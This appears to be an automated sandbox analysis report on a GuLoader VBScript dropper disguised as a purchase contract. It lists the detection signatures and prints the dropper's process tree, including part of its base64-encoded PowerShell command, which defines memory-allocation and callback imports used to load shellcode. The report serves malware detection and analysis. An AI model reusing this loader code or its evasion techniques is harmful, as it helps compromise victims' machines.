Edit tour
Windows
Analysis Report
tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
Overview
General Information
Detection
GuLoader
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
- wscript.exe (PID: 4676 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\tregr ene-KaufVe rtraeg-Joa chimSvenss on-2356433 4.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 7148 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - NoExit -En codedComma nd "IwBlAH IAaAB2AGUA cgB2AHMAaw B1ACAATABl AGoAZQBzAH YAZQBuAGQA ZQA5ACAAQQ ByAGMAaABh AGkAOAAgAF MAYQBnAHMA IABkAHIAbw BzAGgAawBp AGUAcwBoAC AAbABhAG4A ZABzAGsAYQ AgAHcAaQB0 AGMAaABiAG UAbAAgAEgA eQBkAHIAYQ BuAHQAIABT AGMAdQBsAG wAcwBiAGEA IABhAGkAcg BiAHUAcgBz AHQAdQAgAH IAZQB0AHIA aQBiAHUAdA BvACAAZABh AGcAcABhAG EAZgB1ACAA VQBQAFQASA BSACAAbQBv AHIAcABpAG 8AbgBmACAA DQAKAEEAZA BkAC0AVAB5 AHAAZQAgAC 0AVAB5AHAA ZQBEAGUAZg BpAG4AaQB0 AGkAbwBuAC AAQAAiAA0A CgB1AHMAaQ BuAGcAIABT AHkAcwB0AG UAbQA7AA0A CgB1AHMAaQ BuAGcAIABT AHkAcwB0AG UAbQAuAFIA dQBuAHQAaQ BtAGUALgBJ AG4AdABlAH IAbwBwAFMA ZQByAHYAaQ BjAGUAcwA7 AA0ACgBwAH UAYgBsAGkA YwAgAHMAdA BhAHQAaQBj ACAAYwBsAG EAcwBzACAA UwBZAEQAWQ BFAE0ARQBO AEkAVAAxAA 0ACgB7AA0A CgBbAEQAbA BsAEkAbQBw AG8AcgB0AC gAIgBuAHQA ZABsAGwALg BkAGwAbAAi ACkAXQBwAH UAYgBsAGkA YwAgAHMAdA BhAHQAaQBj ACAAZQB4AH QAZQByAG4A IABpAG4AdA AgAE4AdABB AGwAbABvAG MAYQB0AGUA VgBpAHIAdA B1AGEAbABN AGUAbQBvAH IAeQAoAGkA bgB0ACAAUw BZAEQAWQBF AE0ARQBOAE kAVAA2ACwA cgBlAGYAIA BJAG4AdAAz ADIAIABOAG EAdAB1AHIA OQAsAGkAbg B0ACAAcwBl AHIAdQAsAH IAZQBmACAA SQBuAHQAMw AyACAAUwBZ AEQAWQBFAE 0ARQBOAEkA VAAsAGkAbg B0ACAAYQBk AGoAdQAsAG kAbgB0ACAA UwBZAEQAWQ BFAE0ARQBO AEkAVAA3AC kAOwANAAoA WwBEAGwAbA BJAG0AcABv AHIAdAAoAC IAdQBzAGUA cgAzADIALg BkAGwAbAAi ACkAXQBwAH UAYgBsAGkA YwAgAHMAdA BhAHQAaQBj ACAAZQB4AH QAZQByAG4A IABJAG4AdA BQAHQAcgAg AEMAYQBsAG wAVwBpAG4A ZABvAHcAUA ByAG8AYwBX ACgAdQBpAG 4AdAAgAHMA ZQByAHUANQ AsAGkAbgB0 ACAAcwBlAH IAdQA2ACwA aQBuAHQAIA BzAGUAcgB1 ADcALABpAG 4AdAAgAHMA ZQByAHUAOA AsAGkAbgB0 ACAAcwBlAH IAdQA5ACkA OwANAAoAWw BEAGwAbABJ AG0AcABvAH IAdAAoACIA awBlAHIAbg BlAGwAMwAy AC4AZABsAG wAIgApAF0A cAB1AGIAbA BpAGMAIABz AHQAYQB0AG kAYwAgAGUA eAB0AGUAcg BuACAAdgBv AGkAZAAgAF IAdABsAE0A bwB2AGUATQ BlAG0AbwBy AHkAKABJAG 4AdABQAHQA cgAgAHMAZQ ByAHUAMQAs AHIAZQBmAC AASQBuAHQA MwAyACAAcw BlAHIAdQAy ACwAaQBuAH QAIABzAGUA cgB1ADMAKQ A7AA0ACgB9 AA0ACgAiAE AADQAKACMA ZgBlAHIAbg AgAEMAQQBN AFAASABJAF IARQAgAEYA SgBFAEQAUg BFAE4AIABD AEEAUABTAE kAQwBJAE4A IABTAGMAYQ ByAGYAZQBk AGUAbgB0AC AASQBuAHQA ZQA5ACAAQQ BaAFkATQAg AEYASQBHAF UAUgAgAEEA ZgBnAGkAZg B0AHMAbgAz ACAAdQBuAH QAaABvAHIA bgBsACAAUw BhAHUAcwBz ADMAIABOAE 8ATABFACAA SABlAGUAZA BsAGUAcwBz AGIAIABNAE kATgBFAFIA QQAgAFYAaQ BuAGQAZABy AGUAdgBlAH QAIABPAFAA SABJAEQASQ BPACAATQBB AEcATgBFAF QASQBTAEUA IABnAGEAbA B2ACAAbQBp AGwAdABlAG 4AZQBzACAA WABFAE4ATw AgAEEAbABs AGUANQAgAG 4AbwBuAG0A bwBuAGkAcw B0ACAAIAAN AAoAJABTAF kARABZAEUA TQBFAE4ASQ BUADMAPQAw ADsADQAKAC QAUwBZAEQA WQBFAE0ARQ BOAEkAVAA5 AD0AMQAwAD QAOAA1ADcA NgA7AA0ACg AkAFMAWQBE AFkARQBNAE UATgBJAFQA OAA9AFsAUw BZAEQAWQBF AE0ARQBOAE kAVAAxAF0A OgA6AE4AdA